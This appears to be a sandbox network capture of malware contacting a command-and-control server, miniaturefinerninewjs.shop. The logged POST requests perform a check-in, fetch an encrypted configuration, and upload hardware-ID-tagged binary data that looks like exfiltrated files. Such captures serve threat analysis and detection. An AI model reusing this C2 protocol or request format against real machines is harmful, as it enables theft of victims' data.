2024-05-06 05:53:48 UTC	826	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rbv0ops06qeb6vobffmc0kp329; expires=Thu, 29-Aug-2024 23:40:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSNFzES0%2FqWrVy4PfZkujIp5W0nFbK5X8BzIk%2Bu2cN9dQQ%2FQ%2B%2BPier9lye80gMXFCTbt1YP8DTvxjc5dIw4rhXG%2Fs9RN8uegIe2WWEpvJFVVOxiiAkb%2BFkr7%2Fm2OV4d5xifTZpiLETJ1dTfvFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b63b1aa467ba-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49792	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:08 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-06 05:54:08 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bk1hm1lc6sa5q22a0hjggipfo7; expires=Thu, 29-Aug-2024 23:40:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOk%2FIRdU0kLAA4ajQL8ihveUfk10nGOmnRkBNC5b%2Fk2J1rQ8VGr%2Byja9pV7XKWLUYPcClll7F7zgPdYs7b9NDqncfxDzL%2Fei3vV1AzAJsJWFRjdHo4NBCWGHTe3qt6c%2BJL05E7BOt0UJyAU71Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6c1df94a542-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-06 05:54:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49793	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:08 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:08 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-06 05:54:09 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9tisaah1euf5r2e1k0gk9l1qgi; expires=Thu, 29-Aug-2024 23:40:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQlqv1gVNXq%2FNqXiMlCQ7CBp%2FET51gtNZeCVNEz0XJ8YiI2sdMhWqCyQ5b5gFdYF1WkeW%2Fbf2%2FFGFvmLvi6KRpVcQZ8UN3%2FTTp2eJ3xMiUiUiwP6Lp6SiyR0MOmurT3e9U8UdQkpXNFu1oKcDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6c71d59336d-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:09 UTC	549	IN	Data Raw: 35 30 31 0d 0a 7a 4e 63 4f 52 72 36 71 38 4a 37 74 65 55 36 64 35 75 68 47 37 36 5a 54 69 70 6f 4b 6a 57 61 4f 45 61 34 50 65 46 63 6e 43 75 36 33 33 51 64 6b 79 49 6a 4b 76 74 6c 56 52 4a 54 45 6d 79 50 4e 6e 48 50 2b 36 48 2f 6f 53 6f 51 59 6a 47 34 63 64 52 30 71 69 4b 32 37 66 53 4f 53 6f 50 6d 38 67 41 46 73 70 38 61 7a 54 4f 62 64 57 59 4f 54 4b 4f 67 49 72 43 75 4f 4c 51 38 79 52 57 2b 57 75 4c 4a 67 4e 64 66 46 6e 74 36 41 48 44 72 38 69 34 6b 31 68 49 67 36 35 62 67 6d 68 32 2b 48 4d 38 74 31 57 6d 30 48 4b 4b 4f 70 6f 32 38 4c 33 39 6d 62 76 4d 46 7a 52 35 54 45 6a 54 4c 4e 6e 48 4f 6f 78 69 6a 39 42 2f 78 77 77 33 77 6b 64 52 31 78 73 75 36 2b 65 69 50 4d 79 34 54 33 67 68 63 39 77 63 54 53 63 4e 2b 57 59 37 71 71 64 36 39 73 68 32 79 6b 42 69 Data Ascii: 501zNcORr6q8J7teU6d5uhG76ZTipoKjWaOEa4PeFcnCu633QdkyIjKvtlVRJTEmyPNnHP+6H/oSoQYjG4cdR0qiK27fSOSoPm8gAFsp8azTObdWYOTKOgIrCuOLQ8yRW+WuLJgNdfFnt6AHDr8i4k1hIg65bgmh2+HM8t1Wm0HKKOpo28L39mbvMFzR5TEjTLNnHOoxij9B/xww3wkdR1xsu6+eiPMy4T3ghc9wcTScN+WY7qqd69sh2ykBi
2024-05-06 05:54:09 UTC	739	IN	Data Raw: 47 36 64 30 63 6c 34 75 4b 49 75 69 39 54 52 6d 6e 4d 36 63 2f 59 49 62 50 76 65 50 67 53 47 66 7a 7a 6a 6c 39 57 6a 69 44 75 4e 77 7a 47 6f 51 50 30 70 69 69 4b 4f 34 61 69 54 63 69 4e 79 55 35 48 42 73 2b 4a 7a 4b 66 4d 2b 45 45 75 33 6f 62 2b 4d 53 72 6b 6d 4d 42 58 45 71 43 77 50 4f 37 4e 30 48 50 62 53 6a 2b 62 79 49 46 32 79 6e 78 73 6f 73 69 4d 63 79 34 2f 64 72 35 77 2f 2b 63 39 35 72 46 7a 42 58 62 6f 6d 67 76 32 38 32 31 73 61 55 2f 34 59 51 4a 66 71 44 6a 6d 54 44 72 46 71 44 75 47 2f 33 52 4c 51 78 6a 45 77 58 50 6b 6c 69 6d 36 37 31 42 45 2f 44 68 76 71 58 6c 6e 4e 48 6c 4d 53 4e 4b 4d 32 63 63 36 6a 38 61 65 73 46 36 48 33 43 61 52 59 7a 53 32 57 44 71 4c 39 73 49 39 62 41 6d 76 32 43 45 43 50 2f 67 59 63 67 69 38 67 77 37 62 67 6d 68 32 2b Data Ascii: G6d0cl4uKIui9TRmnM6c/YIbPvePgSGfzzjl9WjiDuNwzGoQP0piiKO4aiTciNyU5HBs+JzKfM+EEu3ob+MSrkmMBXEqCwPO7N0HPbSj+byIF2ynxsosiMcy4/dr5w/+c95rFzBXbomgv2821saU/4YQJfqDjmTDrFqDuG/3RLQxjEwXPklim671BE/DhvqXlnNHlMSNKM2cc6j8aesF6H3CaRYzS2WDqL9sI9bAmv2CECP/gYcgi8gw7bgmh2+
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 33 38 62 33 0d 0a 36 4e 72 5a 4c 53 6a 6a 62 4c 6e 63 44 57 58 37 2b 46 6b 69 73 68 78 73 4c 6f 6f 36 51 6a 70 66 4d 4a 74 46 44 52 49 62 6f 69 6a 74 58 34 69 7a 73 2b 54 2f 34 77 64 4b 66 75 45 69 79 47 49 77 44 6e 73 39 47 65 76 53 6f 51 59 70 79 30 64 4c 51 55 77 7a 75 36 61 65 79 72 4b 77 34 62 37 6e 77 6f 57 76 62 47 4a 4b 6f 50 44 4a 36 69 51 41 2f 42 4b 68 42 6a 56 42 58 46 65 42 57 2b 41 37 75 30 75 5a 4e 58 61 67 50 69 4a 45 43 66 74 6c 6f 41 67 6a 4d 55 32 35 2f 6c 6a 36 67 6a 6d 65 4d 68 2f 45 6a 78 47 65 6f 69 75 76 6d 59 69 6e 49 62 36 6c 2b 52 62 4b 2b 66 45 30 6d 62 4e 34 44 7a 34 39 47 50 35 41 2f 78 47 7a 32 4d 55 4d 6c 4d 6f 35 4d 57 71 49 6b 79 33 30 66 71 58 35 46 73 72 38 38 54 53 5a 73 33 4c 50 75 66 77 61 4f 34 41 34 58 66 4e 59 42 Data Ascii: 38b36NrZLSjjbLncDWX7+FkishxsLoo6QjpfMJtFDRIboijtX4izs+T/4wdKfuEiyGIwDns9GevSoQYpy0dLQUwzu6aeyrKw4b7nwoWvbGJKoPDJ6iQA/BKhBjVBXFeBW+A7u0uZNXagPiJECftloAgjMU25/lj6gjmeMh/EjxGeoiuvmYinIb6l+RbK+fE0mbN4Dz49GP5A/xGz2MUMlMo5MWqIky30fqX5Fsr88TSZs3LPufwaO4A4XfNYB
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 6c 4f 37 74 4c 6d 54 73 78 5a 37 33 67 31 6b 5a 2f 49 71 45 49 35 75 45 57 59 50 6e 4a 6f 64 76 39 52 75 6e 42 6c 6f 79 53 53 6a 55 37 50 56 6a 4a 64 48 43 6d 66 4b 44 47 69 7a 37 68 34 41 6b 67 73 45 33 34 50 46 6f 2f 51 50 6a 63 73 31 6d 45 54 68 4c 62 59 32 72 73 69 78 71 74 4b 50 35 76 49 67 44 62 4b 66 47 79 67 6d 6b 2f 6e 47 41 6b 33 65 68 62 49 64 71 70 41 5a 78 64 55 4a 6b 7a 50 62 33 4c 43 44 57 79 4a 2f 32 68 42 51 76 2b 49 71 4b 4b 59 66 57 4f 65 6a 34 5a 75 6b 46 34 48 62 4e 59 52 6b 6e 53 57 36 42 71 4c 31 2b 5a 4a 4b 67 2b 5a 66 50 48 44 53 2f 33 4d 68 6b 72 63 38 39 36 2f 52 70 36 45 62 4e 65 63 39 6d 46 6e 64 77 61 34 4b 67 73 6e 70 6b 74 4b 4f 4e 73 75 64 77 4e 5a 66 76 34 57 53 4b 79 48 47 77 75 69 6a 72 41 4f 42 7a 79 32 4d 65 4d 30 68 Data Ascii: lO7tLmTsxZ73g1kZ/IqEI5uEWYPnJodv9RunBloySSjU7PVjJdHCmfKDGiz7h4AkgsE34PFo/QPjcs1mEThLbY2rsixqtKP5vIgDbKfGygmk/nGAk3ehbIdqpAZxdUJkzPb3LCDWyJ/2hBQv+IqKKYfWOej4ZukF4HbNYRknSW6BqL1+ZJKg+ZfPHDS/3Mhkrc896/Rp6EbNec9mFndwa4KgsnpktKONsudwNZfv4WSKyHGwuijrAOBzy2MeM0h
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 6d 67 6f 31 63 32 55 2f 59 6f 65 4c 66 75 49 67 43 4b 4f 78 7a 37 6e 39 32 43 76 53 6f 51 59 70 79 30 64 4c 51 55 77 7a 75 36 51 65 79 2f 53 7a 74 4b 55 35 41 52 69 6c 2b 2b 54 54 4f 61 76 63 65 2f 30 4b 4c 64 47 72 48 2f 46 61 78 77 77 53 57 6d 4b 70 72 42 6b 49 4e 33 4f 6c 50 2b 41 48 79 6e 2b 69 34 34 6f 67 38 34 77 36 66 52 6a 34 41 2f 70 4d 34 49 46 63 56 34 46 62 35 54 75 37 53 35 6b 37 63 75 45 36 35 38 58 62 4a 66 76 6c 57 72 6c 72 79 69 41 6b 77 4f 76 41 2b 41 7a 6c 43 39 61 4e 46 64 69 68 71 43 77 59 79 48 66 78 35 58 78 69 52 63 6d 39 6f 79 4d 4b 34 54 57 4d 75 54 32 62 2b 45 49 34 6e 37 47 62 68 64 31 43 77 44 6e 78 66 56 72 50 4a 79 51 30 4c 79 6a 48 43 48 52 6a 34 59 6a 7a 61 78 61 39 37 59 41 68 42 32 45 47 4b 63 74 48 54 6b 46 4d 4d 37 75 Data Ascii: mgo1c2U/YoeLfuIgCKOxz7n92CvSoQYpy0dLQUwzu6Qey/SztKU5ARil++TTOavce/0KLdGrH/FaxwwSWmKprBkIN3OlP+AHyn+i44og84w6fRj4A/pM4IFcV4Fb5Tu7S5k7cuE658XbJfvlWrlryiAkwOvA+AzlC9aNFdihqCwYyHfx5XxiRcm9oyMK4TWMuT2b+EI4n7Gbhd1CwDnxfVrPJyQ0LyjHCHRj4Yjzaxa97YAhB2EGKctHTkFMM7u
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 44 4e 6d 76 6d 4f 45 79 62 33 69 34 55 32 6a 4d 73 34 37 2f 4e 6c 34 41 72 70 66 64 35 71 45 54 35 4e 59 59 4b 6f 39 53 4a 4d 74 36 50 53 2b 35 64 62 64 4c 33 45 76 43 65 44 7a 79 44 6e 2b 32 53 76 62 49 64 73 67 67 56 78 4c 43 30 44 35 2b 36 79 59 47 53 45 69 74 4c 77 67 52 73 6a 38 34 69 42 4c 49 7a 49 50 2b 2f 39 59 65 63 4d 2f 6e 4c 49 5a 52 73 37 53 6d 6d 49 71 37 42 6f 49 39 6a 4f 6e 62 7a 42 63 30 65 55 78 49 30 38 7a 5a 78 7a 71 4e 64 76 2b 69 58 57 4d 36 51 47 42 58 73 74 41 35 58 47 33 67 64 6b 32 38 54 53 70 4d 31 62 4a 76 53 41 69 53 43 49 79 7a 44 70 2f 6e 72 6f 44 66 35 39 77 57 49 53 50 55 78 70 69 4b 75 34 61 69 6a 57 79 5a 58 79 67 52 4e 73 73 65 7a 68 54 38 33 44 4b 61 69 67 4b 71 38 6c 2f 47 6a 65 65 78 63 55 53 47 66 4d 78 74 35 7a 61 Data Ascii: DNmvmOEyb3i4U2jMs47/Nl4Arpfd5qET5NYYKo9SJMt6PS+5dbdL3EvCeDzyDn+2SvbIdsggVxLC0D5+6yYGSEitLwgRsj84iBLIzIP+/9YecM/nLIZRs7SmmIq7BoI9jOnbzBc0eUxI08zZxzqNdv+iXWM6QGBXstA5XG3gdk28TSpM1bJvSAiSCIyzDp/nroDf59wWISPUxpiKu4aijWyZXygRNssezhT83DKaigKq8l/GjeexcUSGfMxt5za
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 33 68 78 51 2b 2b 6f 32 43 49 49 54 45 4e 65 4c 31 62 2b 38 42 34 58 62 49 59 78 34 79 52 57 53 44 71 62 31 6a 49 4e 7a 48 30 72 4c 6e 63 45 65 2f 67 35 4a 6b 31 59 5a 78 79 50 4e 2b 7a 67 72 6e 59 59 77 46 63 53 6f 4c 41 4f 65 33 33 51 64 50 6e 4d 2b 65 76 4e 64 5a 62 50 47 4e 69 79 79 44 79 44 6e 73 36 6d 6a 6b 44 65 4e 79 77 32 30 5a 4e 45 39 67 6e 71 69 31 5a 79 7a 62 77 4a 62 79 6e 52 6f 6a 76 38 72 69 54 2b 61 45 4e 76 43 34 4d 4b 31 45 33 57 58 4c 61 68 56 33 62 47 2b 58 72 37 39 76 4c 39 43 49 2b 70 65 51 56 55 53 55 6e 65 4a 50 35 6f 51 32 35 4c 67 77 72 55 54 68 66 38 46 70 43 44 6c 46 61 49 57 70 76 33 34 72 30 38 57 52 2f 49 6f 4a 4c 65 32 4c 67 53 47 4f 77 44 37 6e 39 47 44 6c 52 4b 49 62 70 77 5a 61 4d 6c 30 6f 31 4f 7a 31 51 43 66 4e 77 74 Data Ascii: 3hxQ++o2CIITENeL1b+8B4XbIYx4yRWSDqb1jINzH0rLncEe/g5Jk1YZxyPN+zgrnYYwFcSoLAOe33QdPnM+evNdZbPGNiyyDyDns6mjkDeNyw20ZNE9gnqi1ZyzbwJbynRojv8riT+aENvC4MK1E3WXLahV3bG+Xr79vL9CI+peQVUSUneJP5oQ25LgwrUThf8FpCDlFaIWpv34r08WR/IoJLe2LgSGOwD7n9GDlRKIbpwZaMl0o1Oz1QCfNwt
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 52 35 54 45 6a 54 7a 4e 6e 48 4f 6f 32 33 2f 35 44 76 63 7a 70 41 59 46 65 79 30 44 6c 63 62 65 42 32 54 62 78 4e 4b 6b 7a 56 73 68 2b 49 71 43 49 6f 50 43 49 2b 54 33 62 75 38 46 35 6e 37 41 5a 68 30 37 54 6d 36 4a 6f 37 56 71 49 74 6a 4d 6c 76 4b 4d 57 32 4b 58 37 2b 46 6b 69 74 78 78 73 4c 6f 6f 79 43 6e 64 4d 65 39 36 44 44 39 43 5a 4a 71 6c 74 47 38 79 30 64 6a 53 6c 4f 51 45 59 70 66 76 6b 30 7a 6d 72 33 48 76 39 43 69 33 52 71 78 34 77 6d 67 62 4f 55 39 76 67 72 79 30 5a 69 6a 64 7a 35 58 33 6e 52 41 2b 39 49 79 4a 4b 6f 58 4e 4d 65 62 34 61 65 49 45 72 44 32 6b 42 6e 46 31 51 6e 44 4d 39 76 63 73 41 66 2f 66 68 50 62 4e 4f 44 76 70 6a 6f 30 6f 6d 38 38 77 36 2b 35 6c 2f 30 53 45 47 4e 4d 6a 63 6c 35 63 41 4f 66 46 39 57 73 6f 6e 4a 44 51 76 49 51 Data Ascii: R5TEjTzNnHOo23/5DvczpAYFey0DlcbeB2TbxNKkzVsh+IqCIoPCI+T3bu8F5n7AZh07Tm6Jo7VqItjMlvKMW2KX7+FkitxxsLooyCndMe96DD9CZJqltG8y0djSlOQEYpfvk0zmr3Hv9Ci3Rqx4wmgbOU9vgry0Zijdz5X3nRA+9IyJKoXNMeb4aeIErD2kBnF1QnDM9vcsAf/fhPbNODvpjo0om88w6+5l/0SEGNMjcl5cAOfF9WsonJDQvIQ
2024-05-06 05:54:09 UTC	1369	IN	Data Raw: 4e 4a 6d 33 59 70 5a 67 35 4d 6f 36 78 57 73 4b 34 34 39 53 47 34 51 4f 39 76 2b 35 77 52 50 77 34 62 36 6c 35 5a 7a 52 35 54 45 6e 47 54 56 68 6d 4f 6d 6b 41 4f 45 52 50 34 7a 6c 43 39 61 63 6b 74 6c 6a 61 32 37 62 7a 62 4f 7a 70 48 71 6a 46 77 53 77 61 57 48 4c 34 48 4a 50 75 50 47 56 73 34 4a 35 33 2f 42 59 68 45 4c 65 33 32 50 6f 4c 74 72 4d 73 32 49 33 4a 54 6b 63 47 7a 77 78 4e 4a 6d 74 49 52 35 71 4d 63 6d 68 32 2b 48 4d 39 51 74 51 6e 63 46 58 59 2b 67 75 32 73 79 7a 59 57 7a 38 59 51 58 49 66 43 50 79 6d 72 6c 72 31 71 6f 2f 69 69 33 52 72 77 39 70 41 5a 78 64 55 46 35 7a 50 62 33 50 48 61 48 6e 63 47 72 33 30 6c 45 6c 4a 76 45 54 4f 62 64 57 59 4f 54 4b 50 6c 45 74 44 47 65 49 33 4a 65 4c 69 69 65 37 75 30 75 5a 4a 76 4c 67 4f 36 4a 47 44 72 38 Data Ascii: NJm3YpZg5Mo6xWsK449SG4QO9v+5wRPw4b6l5ZzR5TEnGTVhmOmkAOERP4zlC9acktlja27bzbOzpHqjFwSwaWHL4HJPuPGVs4J53/BYhELe32PoLtrMs2I3JTkcGzwxNJmtIR5qMcmh2+HM9QtQncFXY+gu2syzYWz8YQXIfCPymrlr1qo/ii3Rrw9pAZxdUF5zPb3PHaHncGr30lElJvETObdWYOTKPlEtDGeI3JeLiie7u0uZJvLgO6JGDr8

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49794	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:09 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:09 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:09 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-05-06 05:54:10 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=16gp59t3mdnaake1q4fv8k2rjl; expires=Thu, 29-Aug-2024 23:40:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iJEWYU0xXn9i1kqRrQrewIjRUdi1mrMeOyTER5MTFC8xMIHghhNusL%2BuGJwHXI6TBFEE%2FUVxDxDUoXnBg7gnjTMqbc%2BWB%2BKlC1tSoCYyMpdPcW2LBzXGtbbmw7ndIbps14q01DCtmYSqFRoLSg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6cbcac0a512-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:54:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49795	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:10 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:10 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:10 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2n4hrhkvqr0uhcg5pf2a1ntth7; expires=Thu, 29-Aug-2024 23:40:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qnC73d1rfoj%2FBCt1n9uQrvmMEJamL0ODuNn37k8AJWefJ6nYQ84xa0oHwjI2XoAkUPg7hwfbf5YBYkvm%2BvVhqr9KwDuECg9yA2qNVisuU3PsP6hq3B7DxToP7jqdkSELaCkflTy4j4g%2B785Pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6d02913a4bb-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:54:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49796	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:14 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: miniaturefinerninewjs.shop
